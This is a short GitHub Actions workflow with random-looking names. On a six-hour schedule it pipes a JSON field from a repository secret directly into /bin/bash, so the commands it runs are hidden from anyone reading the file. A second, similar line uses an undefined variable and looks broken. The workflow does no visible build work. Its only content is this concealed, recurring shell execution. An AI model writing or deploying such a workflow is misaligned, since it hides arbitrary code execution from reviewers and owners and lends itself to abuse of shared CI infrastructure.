name: diaoyubu3478

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: diaoyubu3478
        env:
          orxv50: ${{ secrets.orxv50 }}
        run: |
          echo $orxv50 | jq -r .aopd58427 | /bin/bash
          echo $km0 | jq -r .zp9442 | /bin/bash

